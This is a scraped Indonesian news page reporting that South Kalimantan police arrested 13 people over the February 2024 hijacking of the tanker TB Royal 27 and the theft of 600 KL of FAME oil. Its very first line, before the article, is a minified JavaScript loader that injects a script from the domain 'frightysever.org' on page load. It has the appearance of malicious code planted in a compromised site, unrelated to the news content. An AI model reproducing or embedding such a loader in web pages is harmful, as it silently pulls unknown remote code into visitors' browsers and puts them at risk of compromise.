(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Kalimantan Selatan

Komplotan Perompak Kapal TB Royal 27 di Tanjung Selatan Diringkus Ditpolairud Polda Kalsel


KANALKALIMANTAN.COM, BANJARMASIN – Direktorat Kepolisian Perairan dan Udara (Ditpolairud) Polda Kalimantan Selatan (Kalsel) berhasil meringkus belasan orang komplotan perompak kapal TB Royal 27.

Gerombolan perompak kapal itu sebelumnya melancarkan aksi di perairan Tanjung Selatan Kabupaten Tanah Laut Kalsel pada Kamis (1/2/2024).

Kapolda Kalimantan Selatan Irjen Pol Winarto mengungkaplan, komplotan perompak tersebut beraksi pada kapal TB Royal 27 bermuatan minyak fame 3.959 Kilo Liter (KL) milik PT Musimas yang berlayar dari Sampit Kalimantan Tengah menuju PT Pertamina di Tanjung Manggis, Karang Asam, Bali.

Baca juga: Menyulap Dinding Kusam Kawasan “Bandarmasih Tempo Doeloe” Lewat Kompetisi Mural dan Grafiti

Kejadian perompakan setelah kapal berlayar sekitar 12 jam, di tengah perjalanan tepatnya di perairan Tanjung Selatan, delapan pelaku yang menggunakan klotok menaiki kapal TB Royal 27 tersebut dari arah buritan.

Dengan menggunakan pistol mainan, para pelaku mengancam awak kapal yang berjumlah 14 orang dan sempat melakukan penyekapan.

Kapal yang saat itu dikendalikan oleh para pelaku kemudian mendekati kapal SPOB Bagas Dinar Jaya 01 dan SPOB Sumber Baru Mulyo, disana mereka menyalin minyak fame yang ada di kapal TB Royal 27 sebanyak 600 KL.

Setelah menyalin minyak, kedua kapal komplotan perompak itu berlayar menuju Banjarmasin. Sementara kapal TB Royal 27 yang ditinggalkan pelaku kembali dikendalikan para awak kapal.

Baca juga: Atur Ulang Jadwal Rekapitulasi Suara, PPK Banjarbaru Selatan Target 6 Hari Selesai

Kru TB Royal 27 pada Minggu (4/2/2024) kemudian membawa kapal menuju perairan Asamasam, Kabupaten Tanah Bumbu dan melaporkan kejadian tersebut ke PT Musimas selaku pemilik minyak yang sudah dicuri para perompak.

Setelah mendapat informasi itu, pihak perusahaan pun melaporkan kejadian perompakan di tengah perairan tersebut ke Polda Kalsel.

Berselang dua hari usai mendapat laporan, tim gabungan dipimpin Direktur Polairud Polda Kalsel Kombes Pol Andi Adnana Syafruddin berhasil meringkus satu per satu para pelaku di tempat persembunyiannya.

“Total ada 13 pelaku yang ditangkap termasuk para penadah,” kata Kapolda Kalsel Irjen Pol Wiranto saat konfrensi pers, Jumat (16/2/2024) siang.

Baca juga: 37 Warning Light di Banjarbaru Tak Berfungsi, Baterai Banyak Hilang Dicuri

Seluruh pelaku juga dihadirkan saat konfrensi pers di aula Mathilda Batlayeri, Mapolda Kalsel.

Sementara barang bukti yang diamankan diantaranya uang senilai Rp560 juta yang diduga hasil dari penjualan minyak fame, lalu ada beberapa jirigen minyak fame dan barang bukti lainnya.

Saat ini, kata Kapolda Kalsel, tim gabungan masih melakukan pengejaran terhadap tiga pelaku lain yang belum tertangkap. (Kanalkalimantan.com/rizki)

Reporter: rizki
Editor: bie


Muhammad Andi

Recent Posts

Masrumi dari Desa Sungai Namang HSU Raih Prestasi Nasional

KANALKALIMANTAN.COM, SOLO – Masrumi, guru honorer asal Desa Sungai Namang, Kecamatan Danau Panggang, Kabupaten Hulu… Read More

50 menit ago

Pemkab HSU Gelar Upacara HUT ke-75 Proklamasi ALRI Divisi IV Kalimantan

KANALKALIMANTAN.COM, AMUNTAI - Memperingati HUT ke-75 Proklamasi Pemerintahan Gubernur Tentara ALRI Divisi lV Pertahanan Kalimatan,… Read More

1 jam ago

Mantan Karyawan BPR Candi Agung Amuntai Dituntut 7 Tahun

Selewengkan Dana Nasabah, Rugikan Negara Rp779 Juta Read More

1 jam ago

Ungkap Kasus Curanmor di Banjarbaru, 4 Unit Motor Berplat Merah

7 Pelaku Ditangkap dengan Barbuk 21 Unit Sepeda Motor Read More

5 jam ago

Kontestan Kepala Daerah di Kalsel Ditantang Miliki Visi Majukan Perpustakaan

KANALKALIMANTAN.COM, BANJARMASIN - Tim Tenaga Ahli Gubernur Kalimantan Selatan (Kalsel) melakukan kunjungan ke Dinas Perpustakaan… Read More

7 jam ago

Instansi Vertikal Disiapkan Masuk SKPD Instansi Mengajar di Banjarbaru

KANALKALIMANTAN.COM, BANJARBARU - Dinas Pendidikan (Disdik) Kota Banjarbaru siap menggandeng instansi vertikal di Kota Banjarbaru,… Read More

8 jam ago

This website uses cookies.